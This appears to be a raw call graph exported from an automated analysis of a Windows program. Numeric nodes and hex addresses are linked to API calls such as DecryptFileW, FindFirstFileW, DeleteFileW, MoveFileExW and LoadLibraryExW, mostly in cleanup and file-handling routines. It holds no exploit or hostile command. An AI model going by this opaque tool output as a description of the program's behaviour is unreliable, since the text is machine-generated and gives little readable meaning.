49940->49941 49944 8e3dce 52 API calls 49941->49944 49943 8e3f57 49942->49943 49946 8e3dce 52 API calls 49943->49946 49962 8e3f2c 49943->49962 49945 8e3f26 49944->49945 49947 8e4601 52 API calls 49945->49947 49945->49962 49946->49945 49948 8e3fa2 49947->49948 49950 8e6305 5 API calls 49948->49950 49968 8e3faf 49948->49968 49949 8e413e 49953 8e414c 49949->49953 49988 8e367f GetProcessHeap RtlFreeHeap GetLastError 49949->49988 49950->49968 49951 8e3feb GetLocalTime 49951->49968 49955 8e415a 49953->49955 49989 8e367f GetProcessHeap RtlFreeHeap GetLastError 49953->49989 49958 8e4168 49955->49958 49990 8e367f GetProcessHeap RtlFreeHeap GetLastError 49955->49990 49956 8e2acf 56 API calls 49956->49968 49959 9267e6 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 49958->49959 49961 8e4177 49959->49961 49961->49842 49962->49949 49987 8e367f GetProcessHeap RtlFreeHeap GetLastError 49962->49987 49963 8e40ba 49963->49962 49966 8e2eaf 52 API calls 49963->49966 49964 8e4071 GetLastError 49965 8e4083 Sleep 49964->49965 49964->49968 49967 8e4093 49965->49967 49965->49968 49966->49962 49967->49968 49968->49951 49968->49956 49968->49962 49968->49963 49968->49964 49968->49965 49969->49853 49971 8e6321 GetLastError 49970->49971 49980 8e632e 49970->49980 49972 8e6335 49971->49972 49971->49980 49973 8e633a 49972->49973 49976 8e6346 49972->49976 49991 8e6414 GetFileAttributesW 49973->49991 49975 8e6342 49975->49976 49975->49980 49977 8e6305 GetFileAttributesW 49976->49977 49976->49980 49978 8e6385 49977->49978 49979 8e63ad CreateDirectoryW 49978->49979 49978->49980 49981 8e63cb 49979->49981 49982 8e63bb GetLastError 49979->49982 49980->49863 49981->49980 49982->49981 49983->49844 49984->49847 49985->49852 49986->49858 49987->49949 49988->49953 49989->49955 49990->49958 49991->49975 50012 8fed3b 49992->50012 49996 8fcc66 49997 8e6305 5 API calls 49996->49997 50009 8fcc40 49996->50009 49998 8fcc8c 49997->49998 50002 942127 73 API calls 49998->50002 49998->50009 49999 8fcd53 50001 8fcd60 49999->50001 50056 8e367f GetProcessHeap RtlFreeHeap GetLastError 49999->50056 50004 8fcd6d 50001->50004 50057 8e367f GetProcessHeap RtlFreeHeap GetLastError 50001->50057 50005 8fccb8 50002->50005 50004->49767 50005->50009 50028 8fcd75 50005->50028 50009->49999 50055 8e367f GetProcessHeap RtlFreeHeap GetLastError 50009->50055 50010 8e2eaf 52 API calls 50010->50009 50011->49769 50013 8fede9 DecryptFileW 50012->50013 50022 8fed56 50012->50022 50014 8fedfd 50013->50014 50021 8fedb7 50013->50021 50016 8e2eaf 52 API calls 50014->50016 50015 942127 73 API calls 50015->50022 50016->50021 50017 8fcc3a 50017->50009 50024 942127 50017->50024 50019 8e6305 5 API calls 50019->50022 50021->50017 50059 8e367f GetProcessHeap RtlFreeHeap GetLastError 50021->50059 50022->50015 50022->50019 50023 8feda1 50022->50023 50058 93acf6 72 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 50022->50058 50023->50013 50023->50021 50025 942133 50024->50025 50027 942137 50025->50027 50060 941fe9 73 API calls 50025->50060 50027->49996 50029 8fcdc1 50028->50029 50030 8fcdc8 GetLastError 50029->50030 50031 8fce17 50029->50031 50042 8fcdd4 50030->50042 50061 9439dd SetFilePointerEx 50031->50061 50033 8fce21 50033->50042 50064 942b2e 50033->50064 50036 8fce9a SetFilePointerEx 50038 8fceab GetLastError 50036->50038 50039 8fcef2 50036->50039 50037 9267e6 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 50041 8fcce3 50037->50041 50038->50042 50072 943f70 50039->50072 50041->50009 50041->50010 50042->50037 50043 8fcefe 50043->50042 50044 8fcf1b SetFilePointerEx 50043->50044 50045 8fcf2e GetLastError 50044->50045 50046 8fcf74 50044->50046 50045->50042 50047 943f70 2 API calls 50046->50047 50048 8fcf80 50047->50048 50048->50042 50049 943f70 2 API calls 50048->50049 50050 8fcfa9 50049->50050 50050->50042 50051 8fcfc3 SetFilePointerEx 50050->50051 50052 8fcfd6 GetLastError 50051->50052 50054 8fcfe2 50051->50054 50052->50054 50053 943f70 2 API calls 50053->50042 50054->50053 50055->49999 50056->50001 50057->50004 50058->50022 50059->50017 50060->50027 50062 9439ff GetLastError 50061->50062 50063 943a0b 50061->50063 50062->50063 50063->50033 50065 942b3b ___scrt_uninitialize_crt 50064->50065 50066 942ba7 ReadFile 50065->50066 50068 943f70 2 API calls 50065->50068 50069 942c12 50065->50069 50066->50065 50067 942c39 GetLastError 50066->50067 50067->50069 50068->50065 50070 9267e6 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 50069->50070 50071 8fce5f 50070->50071 50071->50036 50071->50042 50073 943f85 WriteFile 50072->50073 50076 943fc0 50072->50076 50074 943f9f GetLastError 50073->50074 50075 943fab 50073->50075 50074->50075 50075->50073 50075->50076 50076->50043 50078 902b5c 50077->50078 50079 902b0e GetLastError 50077->50079 50100 8e2a55 56 API calls 50078->50100 50081 902b1a 50079->50081 50081->49775 50083 902bf7 50082->50083 50087 902c1e 50083->50087 50101 8e2a55 56 API calls 50083->50101 50085 902c15 50085->50087 50102 8e29f3 56 API calls 50085->50102 50087->49777 50088->49780 50089->49784 50090->49779 50091->49782 50092->49787 50093->49787 50094->49791 50095->49794 50096->49802 50097->49798 50098->49799 50099->49800 50100->50081 50101->50085 50102->50087 50104 8e1ae9 56 API calls 50103->50104 50105 8e2b0d 50104->50105 50105->49709 50105->49806 50107 8e38bb 50106->50107 50109 8e38c5 50106->50109 50111 8e593a GetProcessHeap HeapSize 50107->50111 50109->49819 50110->49820 50111->50109 50740 930ef0 15 API calls 50741 8e9ae0 60 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 50742 909ce0 175 API calls 50743 910ee0 81 API calls 50745 930ce0 16 API calls _memcpy_s 50747 8e94f0 76 API calls 2 library calls 50748 90d010 19 API calls 50749 91e210 55 API calls 50750 8f940e 84 API calls 50751 931e10 GetCommandLineA GetCommandLineW 50753 8e9000 72 API calls 50754 926800 49 API calls __RTC_Initialize 50755 933000 GetProcessHeap 50757 926a07 21 API calls _unexpected 50758 8e8e10 6 API calls 50112 90de30 50113 90de52 50112->50113 50118 90de5c 50112->50118 50114 90de57 50113->50114 50115 90de6c 50113->50115 50114->50118 50149 90e2b8 DosDateTimeToFileTime LocalFileTimeToFileTime SetFileTime 50114->50149 50119 90e386 SetEvent 50115->50119 50120 90e3e5 50119->50120 50121 90e39f GetLastError 50119->50121 50122 8e174a 2 API calls 50120->50122 50147 90e3ab 50121->50147 50123 90e3ef 50122->50123 50124 90e419 ResetEvent 50123->50124 50123->50147 50125 90e426 GetLastError 50124->50125 50126 90e46c 50124->50126 50125->50147 50127 8e2ec6 10 API calls 50126->50127 50126->50147 50128 90e4c7 50127->50128 50129 90e4f4 SetEvent 50128->50129 50128->50147 50130 90e501 GetLastError 50129->50130 50131 90e547 50129->50131 50130->50147 50132 8e174a 2 API calls 50131->50132 50133 90e551 50132->50133 50134 90e573 ResetEvent 50133->50134 50133->50147 50135 90e580 GetLastError 50134->50135 50136 90e5c6 50134->50136 50135->50147 50137 90e5d3 50136->50137 50138 90e66d 50136->50138 50137->50147 50150 8e540b GetProcessHeap RtlAllocateHeap 50137->50150 50140 90e692 GetLastError 50138->50140 50141 90e6dc SetFilePointerEx 50138->50141 50148 90e69e 50140->50148 50142 90e6f0 GetLastError 50141->50142 50143 90e736 SetEndOfFile 50141->50143 50142->50147 50144 90e743 GetLastError 50143->50144 50145 90e786 SetFilePointerEx 50143->50145 50144->50147 50146 90e797 GetLastError 50145->50146 50145->50147 50146->50147 50147->50118 50148->50141 50149->50118 50150->50147 50759 8f2c2a LoadLibraryExW GetLastError GetProcAddress GetLastError 50170 94c43d 50171 94c41c 50170->50171 50172 94c6ef ___delayLoadHelper2@8 16 API calls 50171->50172 50172->50171 50760 8e6a25 89 API calls 50761 8fe622 64 API calls 50762 8e9c20 79 API calls 2 library calls 50196 90de20 50197 8e55c9 3 API calls 50196->50197 50198 90de2b 50197->50198 50764 8f9839 94 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 50766 8e9430 9 API calls 50770 926a50 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 50771 90fa55 77 API calls 50773 8e6c2a 7 API calls 50774 92de5b 42 API calls 2 library calls 50779 932070 7 API calls 50780 930670 72 API calls 2 library calls 50781 937e70 IsProcessorFeaturePresent 50784 8e8e60 87 API calls 50785 923604 117 API calls 50645 8e7e72 50646 8e7e78 50645->50646 50647 8e7ee0 50646->50647 50687 8e367f GetProcessHeap RtlFreeHeap GetLastError 50646->50687 50649 8e7ef2 50647->50649 50688 8fa9ad 128 API calls 50647->50688 50650 8f56b4 92 API calls 50649->50650 50652 8e7efe 50650->50652 50653 8ffbe8 92 API calls 50652->50653 50654 8e7f0a 50653->50654 50655 8ffdf6 3 API calls 50654->50655 50656 8e7f16 50655->50656 50657 8e7f42 50656->50657 50658 8e8119 72 API calls 50656->50658 50659 8e8119 72 API calls 50657->50659 50658->50657 50660 8e7f80 50659->50660 50661 93ae56 4 API calls 50660->50661 50662 8e7fc4 50661->50662 50663 8fc13d 54 API calls 50662->50663 50664 8e7ff0 50663->50664 50665 90d6fd 2 API calls 50664->50665 50666 8e803c 50665->50666 50667 906157 2 API calls 50666->50667 50668 8e8050 50667->50668 50669 8e774c 10 API calls 50668->50669 50670 8e80b3 50669->50670 50671 8e80c1 50670->50671 50689 940d9c CoUninitialize 50670->50689 50673 8e80cf 50671->50673 50690 93fbc7 FreeLibrary 50671->50690 50674 8e80dd 50673->50674 50691 93d520 FreeLibrary 50673->50691 50677 8e80f0 50674->50677 50692 9410aa FreeLibrary FreeLibrary 50674->50692 50679 8e80fa 50677->50679 50680 8e80f4 CoUninitialize 50677->50680 50683 93b41c 77 API calls 50679->50683 50680->50679 50681 8e80eb 50693 93a6e3 FreeLibrary FreeLibrary 50681->50693 50684 8e8106 50683->50684 50685 9267e6 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 50684->50685 50686 8e8115 50685->50686 50687->50647 50688->50649 50689->50671 50690->50673 50691->50674 50692->50681 50693->50677 50788 905e6e 93 API calls 49009 94c19c 49010 94c17b 49009->49010 49010->49009 49011 94c6ef ___delayLoadHelper2@8 16 API calls 49010->49011 49011->49010 49012 8e7b87 49013 8e7ba6 49012->49013 49014 8e7b90 49012->49014 49017 8e7bb1 CoInitializeEx 49013->49017 49190 90d137 13 API calls 49014->49190 49016 8e7ba4 49016->49013 49018 8e7b31 49017->49018 49019 8e7ee0 49018->49019 49191 8e367f GetProcessHeap RtlFreeHeap GetLastError 49018->49191 49021 8e7ef2 49019->49021 49192 8fa9ad 128 API calls 49019->49192 49059 8f56b4 49021->49059 49028 8e7f16 49029 8e7f42 49028->49029 49030 8e8119 72 API calls 49028->49030 49031 8e8119 72 API calls 49029->49031 49030->49029 49032 8e7f80 49031->49032 49083 93ae56 EnterCriticalSection 49032->49083 49034 8e7fc4 49088 8fc13d 49034->49088 49040 8e8050 49108 8e774c 49040->49108 49042 8e80b3 49043 8e80c1 49042->49043 49193 940d9c CoUninitialize 49042->49193 49045 8e80cf 49043->49045 49194 93fbc7 FreeLibrary 49043->49194 49046 8e80dd 49045->49046 49195 93d520 FreeLibrary 49045->49195 49049 8e80f0 49046->49049 49196 9410aa FreeLibrary FreeLibrary 49046->49196 49051 8e80fa 49049->49051 49052 8e80f4 CoUninitialize 49049->49052 49179 93b41c 49051->49179 49052->49051 49053 8e80eb 49197 93a6e3 FreeLibrary FreeLibrary 49053->49197 49057 9267e6 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 49058 8e8115 49057->49058 49060 8e7efe 49059->49060 49061 8f56c1 49059->49061 49063 8ffbe8 49060->49063 49198 8e5c81 49061->49198 49064 8ffbf8 49063->49064 49065 8e7f0a 49063->49065 49066 8e5c81 92 API calls 49064->49066 49067 8ffdf6 49065->49067 49066->49065 49068 8ffe0e 49067->49068 49069 8ffe03 49067->49069 49071 8ffe1c 49068->49071 49304 8e367f GetProcessHeap RtlFreeHeap GetLastError 49068->49304 49303 8e3605 GetProcessHeap RtlFreeHeap GetLastError 49069->49303 49073 8ffe2a 49071->49073 49305 8e367f GetProcessHeap RtlFreeHeap GetLastError 49071->49305 49075 8ffe38 49073->49075 49306 8e367f GetProcessHeap RtlFreeHeap GetLastError 49073->49306 49077 8ffe48 49075->49077 49307 8e367f GetProcessHeap RtlFreeHeap GetLastError 49075->49307 49079 8ffe58 49077->49079 49308 8e367f GetProcessHeap RtlFreeHeap GetLastError 49077->49308 49081 8ffe68 _memcpy_s 49079->49081 49309 8e367f GetProcessHeap RtlFreeHeap GetLastError 49079->49309 49081->49028 49084 93ae71 FlushFileBuffers 49083->49084 49087 93ae6e 49083->49087 49085 93aec4 LeaveCriticalSection 49084->49085 49086 93ae7c GetLastError 49084->49086 49085->49034 49086->49087 49087->49085 49310 93a051 49088->49310 49090 8fc15b 49091 93a051 6 API calls 49090->49091 49100 8fc161 49090->49100 49092 8fc195 49091->49092 49093 8fc1ce 49092->49093 49092->49100 49313 8fb637 48 API calls 49092->49313 49093->49100 49314 8fb637 48 API calls 49093->49314 49095 8e7ff0 49101 90d6fd IsWindow 49095->49101 49097 8e55c9 3 API calls 49097->49095 49098 8fc1f7 49099 8e174a 2 API calls 49098->49099 49098->49100 49099->49100 49100->49095 49100->49097 49102 90d714 PostMessageW 49101->49102 49103 8e803c 49101->49103 49102->49103 49104 906157 49103->49104 49105 906163 49104->49105 49106 906170 49104->49106 49107 8e174a 2 API calls 49105->49107 49106->49040 49107->49106 49109 8e775e 49108->49109 49110 8e7764 49108->49110 49488 939966 LocalFree 49109->49488 49112 8e7774 49110->49112 49113 8e55c9 3 API calls 49110->49113 49114 8e55c9 3 API calls 49112->49114 49115 8e7784 DeleteCriticalSection 49112->49115 49113->49112 49114->49115 49117 8e77ce 49115->49117 49326 8fb9e9 49117->49326 49119 8e77fe 49120 8fb9e9 3 API calls 49119->49120 49121 8e780a 49120->49121 49122 8e781a 49121->49122 49489 8e367f GetProcessHeap RtlFreeHeap GetLastError 49121->49489 49332 8f058b 49122->49332 49127 8e7856 49344 8ee956 49127->49344 49133 8e787a 49359 8ec06f DeleteCriticalSection 49133->49359 49139 8e789e 49450 8f003c 49139->49450 49145 8e78bf 49480 8ef3f2 49145->49480 49148 8e78d8 49150 8e78e5 49148->49150 49491 8e367f GetProcessHeap RtlFreeHeap GetLastError 49148->49491 49151 8e78f2 49150->49151 49492 8e367f GetProcessHeap RtlFreeHeap GetLastError 49150->49492 49154 8e78ff 49151->49154 49493 8e367f GetProcessHeap RtlFreeHeap GetLastError 49151->49493 49156 8e790f 49154->49156 49494 8e367f GetProcessHeap RtlFreeHeap GetLastError 49154->49494 49158 8e791f 49156->49158 49495 8e367f GetProcessHeap RtlFreeHeap GetLastError 49156->49495 49160 8e792f 49158->49160 49496 8e367f GetProcessHeap RtlFreeHeap GetLastError 49158->49496 49161 8e793f 49160->49161 49497 8e367f GetProcessHeap RtlFreeHeap GetLastError 49160->49497 49164 8e794f 49161->49164 49498 8e367f GetProcessHeap RtlFreeHeap GetLastError 49161->49498 49166 8e795f 49164->49166 49499 8e367f GetProcessHeap RtlFreeHeap GetLastError 49164->49499 49168 8e796f 49166->49168 49500 8e367f GetProcessHeap RtlFreeHeap GetLastError 49166->49500 49170 8e797f 49168->49170 49501 8e367f GetProcessHeap RtlFreeHeap GetLastError 49168->49501 49172 8e798f 49170->49172 49502 8e367f GetProcessHeap RtlFreeHeap GetLastError 49170->49502 49174 8e799f 49172->49174 49503 8e367f GetProcessHeap RtlFreeHeap GetLastError 49172->49503 49176 8e79af DeleteCriticalSection 49174->49176 49504 8e367f GetProcessHeap RtlFreeHeap GetLastError 49174->49504 49178 8e79c8 _memcpy_s 49176->49178 49178->49042 49634 93ac32 49179->49634 49182 93b443 49187 93b45e 49182->49187 49642 8e367f GetProcessHeap RtlFreeHeap GetLastError 49182->49642 49183 93b432 DeleteCriticalSection 49183->49182 49186 8e8106 49186->49057 49188 93b473 49187->49188 49643 8e367f GetProcessHeap RtlFreeHeap GetLastError 49187->49643 49188->49186 49644 8e367f GetProcessHeap RtlFreeHeap GetLastError 49188->49644 49190->49016 49191->49019 49192->49021 49193->49043 49194->49045 49195->49046 49196->49053 49197->49049 49199 8e5cbb _memcpy_s 49198->49199 49200 8e5cd9 GetFileAttributesW 49199->49200 49201 8e5cf4 GetLastError 49200->49201 49202 8e5d61 49200->49202 49217 8e5d00 49201->49217 49203 8e5d6d SetFileAttributesW 49202->49203 49204 8e5dda 49202->49204 49229 8e60d8 49202->49229 49203->49204 49205 8e5d7d GetLastError 49203->49205 49206 8e615c RemoveDirectoryW 49204->49206 49207 8e5e01 49204->49207 49244 8e4dd8 49204->49244 49212 8e5d89 49205->49212 49210 8e616d GetLastError 49206->49210 49206->49229 49208 8e3db5 52 API calls 49207->49208 49207->49217 49213 8e5e3a FindFirstFileW 49208->49213 49211 8e6179 49210->49211 49218 8e6190 MoveFileExW 49211->49218 49211->49229 49212->49217 49219 8e5e78 GetLastError 49213->49219 49243 8e5e84 49213->49243 49214 8e62af FindClose 49214->49217 49216 8e62ca 49221 8e62de 49216->49221 49260 8e367f GetProcessHeap RtlFreeHeap GetLastError 49216->49260 49217->49216 49259 8e367f GetProcessHeap RtlFreeHeap GetLastError 49217->49259 49218->49229 49219->49243 49223 8e62f2 49221->49223 49261 8e367f GetProcessHeap RtlFreeHeap GetLastError 49221->49261 49226 9267e6 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 49223->49226 49224 8e60b7 FindNextFileW 49228 8e614d GetLastError 49224->49228 49224->49243 49227 8e6301 49226->49227 49227->49060 49228->49206 49230 8e61fd GetLastError 49228->49230 49229->49214 49229->49217 49230->49229 49231 8e3db5 52 API calls 49231->49243 49232 8e5fba SetFileAttributesW 49233 8e600b DeleteFileW 49232->49233 49235 8e5fcf GetLastError 49232->49235 49233->49243 49234 8e3cfd 52 API calls 49234->49243 49241 8e5fdb 49235->49241 49236 8e607a GetLastError 49236->49243 49238 8e5c81 73 API calls 49238->49243 49239 8e60f2 49239->49229 49240 8e6048 MoveFileExW 49240->49241 49241->49239 49241->49240 49242 8e606a MoveFileExW 49241->49242 49241->49243 49258 8e4b8a 59 API calls 49241->49258 49242->49243 49243->49224 49243->49229 49243->49231 49243->49232 49243->49233 49243->49234 49243->49236 49243->49238 49243->49241 49245 8e4e46 49244->49245 49246 8e4df2 49244->49246 49248 8e29c8 52 API calls 49245->49248 49247 8e37f3 2 API calls 49246->49247 49249 8e4dfc 49247->49249 49248->49249 49253 8e4e02 49249->49253 49262 8e1839 49249->49262 49251 8e4e2f 49252 8e4e6c GetProcAddress 49251->49252 49251->49253 49255 8e4e83 49252->49255 49253->49207 49254 8e4f0c GetLastError 49257 8e4ec7 49254->49257 49255->49254 49256 8e29c8 52 API calls 49255->49256 49255->49257 49256->49255 49257->49253 49258->49241 49259->49216 49260->49221 49261->49223 49270 8e13da 49262->49270 49264 8e1844 49265 8e184c LoadLibraryExW 49264->49265 49266 8e18ab 49264->49266 49267 8e1866 GetLastError 49265->49267 49269 8e1872 49265->49269 49276 8e18c0 49266->49276 49267->49269 49269->49251 49271 8e146b 49270->49271 49272 8e13e7 GetModuleHandleW 49270->49272 49271->49264 49273 8e143e GetProcAddress GetProcAddress 49272->49273 49274 8e13f9 GetLastError 49272->49274 49273->49271 49275 8e1405 49274->49275 49275->49264 49286 8e48c2 49276->49286 49278 8e18d8 49279 8e2acf 56 API calls 49278->49279 49285 8e18de 49278->49285 49280 8e1910 49279->49280 49281 8e1937 LoadLibraryExW 49280->49281 49280->49285 49282 8e194c GetLastError 49281->49282 49281->49285 49282->49285 49283 8e19a7 49283->49269 49285->49283 49302 8e367f GetProcessHeap RtlFreeHeap GetLastError 49285->49302 49287 8e48d6 49286->49287 49288 8e4951 49286->49288 49290 8e37f3 2 API calls 49287->49290 49289 8e29c8 52 API calls 49288->49289 49291 8e48e1 49289->49291 49290->49291 49292 8e4901 GetSystemDirectoryW 49291->49292 49295 8e48e7 49291->49295 49293 8e497a 49292->49293 49294 8e4910 GetLastError 49292->49294 49297 8e29c8 52 API calls 49293->49297 49301 8e49e4 49293->49301 49294->49295 49295->49278 49296 8e3cfd 52 API calls 49296->49295 49298 8e4986 49297->49298 49298->49295 49299 8e499d GetSystemDirectoryW 49298->49299 49300 8e49aa GetLastError 49299->49300 49299->49301 49300->49295 49301->49295 49301->49296 49302->49283 49303->49068 49304->49071 49305->49073 49306->49075 49307->49077 49308->49079 49309->49081 49315 939a4d 49310->49315 49312 93a069 49312->49090 49313->49093 49314->49098 49316 939ad0 49315->49316 49317 939a69 49315->49317 49325 8e540b GetProcessHeap RtlAllocateHeap 49316->49325 49323 8e593a GetProcessHeap HeapSize 49317->49323 49320 939a74 49321 939a7a 49320->49321 49324 8e56c2 GetProcessHeap HeapReAlloc 49320->49324 49321->49312 49323->49320 49324->49321 49325->49321 49328 8fb9f9 49326->49328 49327 8fba48 49331 8fba54 49327->49331 49506 8e367f GetProcessHeap RtlFreeHeap GetLastError 49327->49506 49328->49327 49505 8e367f GetProcessHeap RtlFreeHeap GetLastError 49328->49505 49331->49119 49333 8f0598 49332->49333 49335 8e783d DeleteCriticalSection 49332->49335 49337 8f05bf 49333->49337 49507 8e367f GetProcessHeap RtlFreeHeap GetLastError 49333->49507 49334 8e55c9 3 API calls 49334->49335 49338 8f5739 49335->49338 49337->49334 49339 8f574e 49338->49339 49340 8f5746 49338->49340 49342 8f003c 3 API calls 49339->49342 49508 8e367f GetProcessHeap RtlFreeHeap GetLastError 49340->49508 49343 8f5754 _memcpy_s 49342->49343 49343->49127 49345 8ee965 49344->49345 49346 8e7862 49344->49346 49348 8e367f GetProcessHeap RtlFreeHeap GetLastError 49345->49348 49349 8ee9ab 49345->49349 49350 901a5b 49346->49350 49347 8e55c9 3 API calls 49347->49346 49348->49345 49349->49347 49351 8e786e 49350->49351 49352 901a67 49350->49352 49354 8f6e65 49351->49354 49509 94542a GetProcessHeap RtlFreeHeap GetLastError 49352->49509 49510 8f5d86 49354->49510 49358 8f6e83 _memcpy_s 49358->49133 49360 8ec086 49359->49360 49361 8e7886 49359->49361 49363 8ec0bc 49360->49363 49585 8e367f GetProcessHeap RtlFreeHeap GetLastError 49360->49585 49586 90dcae GetProcessHeap RtlFreeHeap GetLastError GetProcessHeap HeapSize 49360->49586 49366 8f27a8 49361->49366 49362 8e55c9 3 API calls 49362->49361 49363->49362 49367 8e7892 49366->49367 49370 8f27bb 49366->49370 49372 8f9cf3 49367->49372 49368 8f2877 49369 8e55c9 3 API calls 49368->49369 49369->49367 49370->49368 49371 8e367f GetProcessHeap RtlFreeHeap GetLastError 49370->49371 49371->49370 49373 8f9d0a 49372->49373 49374 8f9d02 49372->49374 49376 8f9d18 49373->49376 49598 8e367f GetProcessHeap RtlFreeHeap GetLastError 49373->49598 49597 8e367f GetProcessHeap RtlFreeHeap GetLastError 49374->49597 49378 8f9d37 49376->49378 49599 8e367f GetProcessHeap RtlFreeHeap GetLastError 49376->49599 49379 8f9d44 49378->49379 49382 8e55c9 3 API calls 49378->49382 49380 8f9d61 49379->49380 49600 8e367f GetProcessHeap RtlFreeHeap GetLastError 49379->49600 49383 8f9d6e 49380->49383 49385 8e55c9 3 API calls 49380->49385 49382->49379 49386 8f9d8b 49383->49386 49601 8e367f GetProcessHeap RtlFreeHeap GetLastError 49383->49601 49385->49383 49387 8f9d98 49386->49387 49390 8e55c9 3 API calls 49386->49390 49388 8f9db5 49387->49388 49602 8e367f GetProcessHeap RtlFreeHeap GetLastError 49387->49602 49391 8f9dc2 49388->49391 49393 8e55c9 3 API calls 49388->49393 49390->49387 49394 8f9dcf 49391->49394 49603 8e367f GetProcessHeap RtlFreeHeap GetLastError 49391->49603 49393->49391 49396 8f9ddc 49394->49396 49604 8e367f GetProcessHeap RtlFreeHeap GetLastError 49394->49604 49398 8f9de9 49396->49398 49605 8e367f GetProcessHeap RtlFreeHeap GetLastError 49396->49605 49399 8f9df6 49398->49399 49606 8e367f GetProcessHeap RtlFreeHeap GetLastError 49398->49606 49402 8f9e03 49399->49402 49607 8e367f GetProcessHeap RtlFreeHeap GetLastError 49399->49607 49404 8f9e10 49402->49404 49608 8e367f GetProcessHeap RtlFreeHeap GetLastError 49402->49608 49406 8f9e1d 49404->49406 49609 8e367f GetProcessHeap RtlFreeHeap GetLastError 49404->49609 49408 8f9e2a 49406->49408 49610 8e367f GetProcessHeap RtlFreeHeap GetLastError 49406->49610 49409 8f9e37 49408->49409 49611 8e367f GetProcessHeap RtlFreeHeap GetLastError 49408->49611 49412 8f9e44 49409->49412 49612 8e367f GetProcessHeap RtlFreeHeap GetLastError 49409->49612 49414 8f9e51 49412->49414 49613 8e367f GetProcessHeap RtlFreeHeap GetLastError 49412->49613 49416 8f9e5e 49414->49416 49614 8e367f GetProcessHeap RtlFreeHeap GetLastError 49414->49614 49418 8f9e6b 49416->49418 49615 8e367f GetProcessHeap RtlFreeHeap GetLastError 49416->49615 49420 8f9e78 49418->49420 49616 8e367f GetProcessHeap RtlFreeHeap GetLastError 49418->49616 49422 8f9e85 49420->49422 49617 8e367f GetProcessHeap RtlFreeHeap GetLastError 49420->49617 49424 8f9e95 49422->49424 49618 8e367f GetProcessHeap RtlFreeHeap GetLastError 49422->49618 49426 8f9ea5 49424->49426 49619 8e367f GetProcessHeap RtlFreeHeap GetLastError 49424->49619 49428 8f9eb5 49426->49428 49620 8e367f GetProcessHeap RtlFreeHeap GetLastError 49426->49620 49430 8f9ec5 49428->49430 49621 8e367f GetProcessHeap RtlFreeHeap GetLastError 49428->49621 49431 8f9ed5 49430->49431 49622 8e367f GetProcessHeap RtlFreeHeap GetLastError 49430->49622 49434 8f9ee5 49431->49434 49623 8e367f GetProcessHeap RtlFreeHeap GetLastError 49431->49623 49446 8f9ef5 49434->49446 49624 8e367f GetProcessHeap RtlFreeHeap GetLastError 49434->49624 49437 8f9f76 49438 8f9f88 49437->49438 49625 8e367f GetProcessHeap RtlFreeHeap GetLastError 49437->49625 49441 8f9f98 49438->49441 49626 8e367f GetProcessHeap RtlFreeHeap GetLastError 49438->49626 49439 8f9f6e 49442 8e55c9 3 API calls 49439->49442 49587 91022a 49441->49587 49442->49437 49446->49437 49446->49439 49448 8e367f GetProcessHeap RtlFreeHeap GetLastError 49446->49448 49447 8f9fba _memcpy_s 49447->49139 49448->49446 49451 8f0070 49450->49451 49457 8f0049 49450->49457 49453 8e78aa 49451->49453 49631 944b0d GetProcessHeap RtlFreeHeap GetLastError 49451->49631 49452 8f0067 49455 8e55c9 3 API calls 49452->49455 49458 8f6ce3 49453->49458 49455->49451 49457->49452 49630 8ef6ce GetProcessHeap RtlFreeHeap GetLastError 49457->49630 49463 8f6d4d 49458->49463 49473 8f6cf5 49458->49473 49459 8f6d45 49460 8e55c9 3 API calls 49459->49460 49460->49463 49461 8f6d72 49465 8e55c9 3 API calls 49461->49465 49462 8f6dab 49464 8f6db9 49462->49464 49469 8e55c9 3 API calls 49462->49469 49463->49461 49468 8f5d86 3 API calls 49463->49468 49471 8f6d7d 49463->49471 49470 8e78b6 49464->49470 49474 8e55c9 3 API calls 49464->49474 49465->49471 49466 8f6da3 49467 8e55c9 3 API calls 49466->49467 49467->49462 49468->49463 49469->49464 49476 8ee406 49470->49476 49471->49462 49471->49466 49632 8e367f GetProcessHeap RtlFreeHeap GetLastError 49471->49632 49472 8e367f GetProcessHeap RtlFreeHeap GetLastError 49472->49473 49473->49459 49473->49472 49474->49470 49477 8ee413 49476->49477 49479 8ee41b _memcpy_s 49476->49479 49478 8e55c9 3 API calls 49477->49478 49478->49479 49479->49145 49481 8e78cb 49480->49481 49485 8ef404 49480->49485 49481->49148 49490 8e367f GetProcessHeap RtlFreeHeap GetLastError 49481->49490 49482 8ef4c5 49483 8e55c9 3 API calls 49482->49483 49483->49481 49484 8e55c9 3 API calls 49484->49485 49485->49482 49485->49484 49486 8e367f GetProcessHeap RtlFreeHeap GetLastError 49485->49486 49633 944b0d GetProcessHeap RtlFreeHeap GetLastError 49485->49633 49486->49485 49488->49110 49489->49122 49490->49148 49491->49150 49492->49151 49493->49154 49494->49156 49495->49158 49496->49160 49497->49161 49498->49164 49499->49166 49500->49168 49501->49170 49502->49172 49503->49174 49504->49176 49505->49327 49506->49331 49507->49333 49508->49339 49509->49351 49511 8f5d99 49510->49511 49512 8f5d92 49510->49512 49513 8f5da7 49511->49513 49566 8e367f GetProcessHeap RtlFreeHeap GetLastError 49511->49566 49565 8e367f GetProcessHeap RtlFreeHeap GetLastError 49512->49565 49516 8f5db5 49513->49516 49567 8e367f GetProcessHeap RtlFreeHeap GetLastError 49513->49567 49518 8f5dc3 49516->49518 49568 8e367f GetProcessHeap 